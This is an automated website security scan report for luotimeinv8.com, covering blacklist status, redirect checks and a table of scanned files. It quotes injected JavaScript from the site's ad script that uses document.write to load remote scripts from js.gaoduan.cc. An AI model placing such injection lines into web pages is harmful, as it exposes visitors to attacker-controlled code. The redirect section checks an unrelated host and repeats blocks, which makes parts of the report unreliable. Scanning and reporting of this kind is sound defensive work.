Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=luotimeinv8.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elianeelias.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 05:23:20 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://elianeelias.com/coda/xmlrpc.php
X-Powered-By: PHP/5.3.29-pl0-gentoo
GET / HTTP/1.1
Host: elianeelias.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 05:23:20 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://elianeelias.com/coda/xmlrpc.php
X-Powered-By: PHP/5.3.29-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: elianeelias.com
Referer: http://www.google.com/search?q=elianeelias.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elianeelias.com
Referer: http://www.google.com/search?q=elianeelias.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://www.luotimeinv8.com/ | 200 OK Content-Length: 17036 Content-Type: text/html | clean |
http://www.luotimeinv8.com/ad/ad.js | 200 OK Content-Length: 4704 Content-Type: application/x-javascript | clean |
http://s13.cnzz.com/stat.php?id=5684704&web_id=5684704 | 200 OK Content-Length: 9322 Content-Type: application/javascript | clean |
http://www.luotimeinv8.com/ad/t.js | 200 OK Content-Length: 292 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<script src="http://js.gaoduan.cc/page/?s=775"></script>'); document.write('<script src="http://js.gaoduan.cc/page/?s=774"></script>'); document.write('<script src="http://js.gaoduan.cc/page/?s=1051"></script>'); Antivirus reports:
| ||
http://www.luotimeinv8.com/a/rosi/ | 200 OK Content-Length: 15372 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/xiuren/ | 200 OK Content-Length: 14380 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/tuigirl/ | 200 OK Content-Length: 12907 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/ugirls/ | 200 OK Content-Length: 12689 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/baorumeinv/ | 200 OK Content-Length: 12440 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/mm/ | 200 OK Content-Length: 11891 Content-Type: text/html | clean |
http://www.luotimeinv8.com/ad/rand1.html | 200 OK Content-Length: 17036 Content-Type: text/html | clean |
http://www.luotimeinv8.com/ad/rand.html | HTTP/1.1 200 OK Cache-Control: no-cache,max-age=2592000 Date: Wed, 27 Aug 2014 16:24:27 GMT Accept-Ranges: bytes ETag: "02fec116fbfcf1:0" Server: Apache/2.23 (Linux/SUSE) Content-Length: 945 Content-Type: text/html Last-Modified: Sun, 24 Aug 2014 07:43:18 GMT Set-Cookie: safedog-flow-item=9452DEDB9166FD98EE1C2E2D48109716; expires=Sat, 3-Oct-2150 17:57:43 GMT; domain=luotimeinv8.com; path=/ | malicious |
http://www.147rentiyishu.net/ | 200 OK Content-Length: 27612 Content-Type: text/html | clean |
http://www.147rentiyishu.net/ad/ad.js | 200 OK Content-Length: 2676 Content-Type: application/x-javascript | clean |
http://s23.cnzz.com/stat.php?id=1252913640&web_id=1252913640 | 200 OK Content-Length: 9325 Content-Type: application/javascript | clean |
http://www.luotimeinv8.com/test404page.js | 200 OK Content-Length: 17036 Content-Type: text/html | clean |